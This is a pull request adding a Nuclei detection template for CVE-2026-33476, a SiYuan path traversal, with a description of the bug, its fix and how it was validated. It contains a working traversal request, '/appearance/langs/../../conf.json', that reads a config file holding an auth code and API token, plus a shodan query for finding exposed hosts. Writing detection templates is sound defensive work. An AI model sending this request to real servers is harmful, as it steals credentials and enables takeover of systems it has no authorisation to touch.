### PR TITLE
CVE-2026-33476 (SiYuan <= v3.6.1 - Unauthenticated Path Traversal)

### DIFF
--- a/http/cves/2026/CVE-2026-33476.yaml
+++ b/http/cves/2026/CVE-2026-33476.yaml
@@ -1,0 +1,55 @@
+id: CVE-2026-33476
+
+info:
+  name: SiYuan <= v3.6.1 - Unauthenticated Path Traversal
+  author: WRG-11
+  severity: high
+  description: |
+    SiYuan before v3.6.2 registers the static route `GET /appearance/*filepath` without an
+    authentication middleware (the auth layer explicitly skips `/appearance/` requests) and joins
+    the user-controlled path onto the appearance directory with `filepath.Join` and no containment
+    check. The language-pack branch then reads the resolved path with `os.ReadFile` and returns it
+    as JSON, so an unauthenticated attacker can traverse out of the appearance directory and disclose
+    arbitrary JSON files. Reading the workspace `conf.json` exposes the kernel access-auth-code and
+    API token.
+  impact: |
+    Unauthenticated disclosure of the SiYuan workspace configuration, including the access-auth-code
+    and API token, which leads to full kernel API takeover.
+  remediation: |
+    Upgrade to SiYuan v3.6.2 or later. The fix adds a `util.IsSubPath` containment check that
+    returns HTTP 401 when the resolved path escapes the appearance directory.
+  reference:
+    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7
+    - https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-33476
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-33476
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: siyuan-note
+    product: siyuan
+    shodan-query: http.favicon.hash:-1450125239
+  tags: cve,cve2026,siyuan,lfi,traversal,unauth,exposure
+
+http:
+  - raw:
+      - |
+        GET /appearance/langs/../../conf.json HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"kernelVersion"'
+          - '"logLevel"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-33476.yaml
+++ b/http/cves/2026/CVE-2026-33476.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-33476
 
 info:
-  name: SiYuan <= v3.6.1 - Unauthenticated Path Traversal
+  name: SiYuan <= v3.6.1 - Path Traversal
   author: WRG-11
   severity: high
   description: |
@@ -25,7 +25,7 @@ info:
     vendor: siyuan-note
     product: siyuan
     shodan-query: http.favicon.hash:-1450125239
-  tags: cve,cve2026,siyuan,lfi,traversal,unauth,exposure
+  tags: cve,cve2026,siyuan,lfi,traversal,exposure
 
 http:
   - raw:
@@ -41,6 +41,11 @@ http:
           - '"kernelVersion"'
           - '"logLevel"'
         condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - 'application/json'
 
       - type: status
         status:

--- a/http/cves/2026/CVE-2026-33476.yaml
+++ b/http/cves/2026/CVE-2026-33476.yaml
@@ -5,19 +5,11 @@ info:
   author: WRG-11
   severity: high
   description: |
-    SiYuan before v3.6.2 registers the static route `GET /appearance/*filepath` without an
-    authentication middleware (the auth layer explicitly skips `/appearance/` requests) and joins
-    the user-controlled path onto the appearance directory with `filepath.Join` and no containment
-    check. The language-pack branch then reads the resolved path with `os.ReadFile` and returns it
-    as JSON, so an unauthenticated attacker can traverse out of the appearance directory and disclose
-    arbitrary JSON files. Reading the workspace `conf.json` exposes the kernel access-auth-code and
-    API token.
+    SiYuan is a personal knowledge management system. Prior to version 3.6.2, the Siyuan kernel exposes an unauthenticated file-serving endpoint under `/appearance/*filepath.` Due to improper path sanitization, attackers can perform directory traversal and read arbitrary files accessible to the server process. Authentication checks explicitly exclude this endpoint, allowing exploitation without valid credentials. Version 3.6.2 fixes this issue.
   impact: |
-    Unauthenticated disclosure of the SiYuan workspace configuration, including the access-auth-code
-    and API token, which leads to full kernel API takeover.
+    Unauthenticated attackers can read arbitrary files accessible to the server, potentially exposing sensitive information.
   remediation: |
-    Upgrade to SiYuan v3.6.2 or later. The fix adds a `util.IsSubPath` containment check that
-    returns HTTP 401 when the resolved path escapes the appearance directory.
+    Update to version 3.6.2 or later.
   reference:
     - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7
     - https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a


### PR DESCRIPTION
### CVE-2026-33476 — SiYuan <= v3.6.1 Unauthenticated Path Traversal

Adds a detection template for **CVE-2026-33476** (CVSS 7.5, CWE-22), an unauthenticated path traversal in SiYuan's `GET /appearance/*filepath` static handler. The auth middleware explicitly skips `/appearance/` requests, and the handler joins the user-controlled path onto the appearance directory with `filepath.Join` and no containment check; the language-pack branch then `os.ReadFile`s the resolved path and returns it as JSON. Requesting `/appearance/langs/../../conf.json` discloses the workspace `conf.json`, which contains the kernel access-auth-code and API token. Fixed in v3.6.2 by a `util.IsSubPath` check that returns HTTP 401 when the resolved path escapes the appearance directory.

**Template**
- Single unauthenticated `GET /appearance/langs/../../conf.json`.
- Matches on `conf.json`-only keys (`"kernelVersion"` + `"logLevel"`) present in the leaked JSON, plus status `200` — so a failed read (which falls back to the language map) and the patched `401` do not match.
- The traversal path is install-independent (SiYuan's fixed `conf/appearance` → `conf/conf.json` layout).

**Validation**
- `nuclei -validate`: passed.
- Vulnerable `b3log/siyuan:v3.6.1` → matches.
- Patched `b3log/siyuan:v3.6.2` → no match (handler returns `401`); legitimate `/appearance/...` requests still serve normally.

**References**
- https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hhgj-gg9h-rjp7
- https://github.com/siyuan-note/siyuan/commit/009bb598b3beccc972aa5f1ed88b3b224326bf2a
- https://nvd.nist.gov/vuln/detail/CVE-2026-33476
